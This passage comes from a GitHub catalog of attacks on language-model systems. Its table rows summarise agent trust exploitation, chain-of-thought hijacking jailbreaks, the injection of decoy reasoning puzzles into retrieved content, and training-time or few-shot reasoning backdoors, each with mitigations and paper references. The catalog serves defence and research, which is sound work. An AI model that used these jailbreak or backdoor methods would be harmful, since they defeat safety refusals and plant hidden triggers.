LLM-ATTK-1003 Human-Agent Trust Exploitation OWASP ASI09; OWASP LLM09 Polished, confident agent explanations induce humans to approve harmful tool calls. Surface uncertainty explicitly; second-model critique; human-in-loop only for high-blast-radius actions. OWASP Agentic Top 10 (2026)
LLM-ATTK-1004 Cascading Failures in Agent Pipelines OWASP ASI08 An error or compromise in one agent propagates and compounds across a multi-step agent chain. Per-step verifier; bounded confidence compounding; circuit breakers between agents. OWASP Agentic Top 10 (2026)

Group 11 — Reasoning-Model / Chain-of-Thought-Specific

New surface for large reasoning models (o1/o3, DeepSeek-R1, Gemini Thinking, Claude extended thinking): attacks that exploit the exposed or extended intermediate reasoning trace itself — as a jailbreak vector, a resource sink, or a backdoor target. Distinct from the output-targeting jailbreaks (Group 2),

ID Technique Framework Description Mitigation References
LLM-ATTK-1101 H-CoT (Hijacking the CoT Safety Reasoning) OWASP LLM01-adj; ATLAS AML.T0054 Feeds the LRM fabricated copies of its own displayed intermediate safety reasoning to hijack the safety-reasoning step; drops o1 refusal 98%→<2% (also o3/DeepSeek-R1/Gemini 2.0 Flash Thinking). Don't expose raw safety reasoning; reasoning-trace integrity checks; intent classification independent of model's own CoT. H-CoT: arXiv 2502.12893 (Feb 2025)
LLM-ATTK-1102 Chain-of-Thought Hijacking (refusal dilution) OWASP LLM01-adj; ATLAS AML.T0054 Prepends long benign reasoning (e.g. puzzles) before the harmful ask + a final-answer cue; shifts attention off harmful tokens, weakening the low-dim refusal signal. ASR 94–100% (Gemini 2.5 Pro / o4-mini / Grok 3 Mini / Claude 4 Sonnet). Inverts "more reasoning = safer". Attention/length-robust safety; cumulative-intent scoring over the whole prompt; cap benign-prefix dilution. CoT Hijacking: arXiv 2510.26418 (Oct 2025, w/ Anthropic); cf. HauntAttack 2506.07031
LLM-ATTK-1103 OverThink (reasoning-token denial-of-wallet) OWASP LLM10; ATLAS AML.T0029 Indirect-injects benign decoy reasoning problems (Sudoku/MDP) into retrievable/RAG content to force 18–46× extra hidden CoT tokens while still returning a correct visible answer; reasoning + answer tokens are both billed (~4× output cost). Reasoning-token budget caps; per-query cost anomaly detection; sanitise retrieved content for injected puzzles. OverThink: arXiv 2502.02542 (Feb 2025); cf. ExtendAttack 2506.13737
LLM-ATTK-1104 BadThink (training-time overthinking backdoor) OWASP LLM04; ATLAS AML.T0018 Poisoning-based fine-tune: a trigger inflates reasoning-trace length >17× (MATH-500) while keeping the final answer correct — covert cost/perf degradation that output-accuracy evals miss. (NOT the "first" such backdoor — that primacy claim was refuted.) Trace-length anomaly monitoring; provenance on fine-tuned weights; post-tune behavioural evals. BadThink: arXiv 2511.10714 (AAAI 2025); cf. BadReasoner 2507.18305
LLM-ATTK-1105 ShadowCoT (internal-reasoning-path backdoor) OWASP LLM04; ATLAS AML.T0018 Parameter-efficient fine-tune conditions on internal reasoning states, rewires attention pathways and perturbs intermediate reps to disrupt key reasoning steps (94.4% ASR, 88.4% hijack, 0.15% params). Distinct from generic Backdoor/Sleeper. Interpretability probes on reasoning paths; treat 3rd-party weights as untrusted; provenance. ShadowCoT: arXiv 2504.05605 (Apr 2025)
LLM-ATTK-1106 BadChain (demonstration-CoT backdoor) OWASP LLM01; ATLAS AML.T0051 No training/parameter access: inserts a malicious backdoor reasoning step into the few-shot demonstration CoT so a trigger phrase in the query alters the final answer. More effective on stronger reasoners (97% ASR GPT-4). Inspect/normalise few-shot demonstrations; trigger-phrase anomaly detection; demonstration provenance. BadChain: arXiv 2401.12242 (ICLR 2024)

Contributing

New techniques, better framework mappings, fresh references, and corrections are all welcome. Keep entries vendor-neutral and citation-backed. See contributing.md.

License & Attribution

Licensed under CC-BY-4.0 — you may share and adapt this catalog for any purpose, including commercial and private products, as long as you give appropriate credit.

When you reuse this material, please credit it like this:

"Awesome LLM Attacks" by Martin Holovsky, licensed under CC BY 4.0https://github.com/martinholovsky/awesome-llm-attacks

BibTeX:

@misc{holovsky_awesome_llm_attacks,
  author       = {Martin Holovsky},
  title        = {Awesome LLM Attacks: A Framework-Mapped Catalog of LLM \& GenAI Attack Techniques},
  howpublished = {\url{https://github.com/martinholovsky/awesome-llm-attacks}},
  note         = {Licensed under CC BY 4.0}
}

About

A curated, framework-mapped catalog of attack techniques against LLM and GenAI systems — cross-referenced to OWASP LLM Top 10, MITRE ATLAS, OWASP ASI, and MCP security.

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors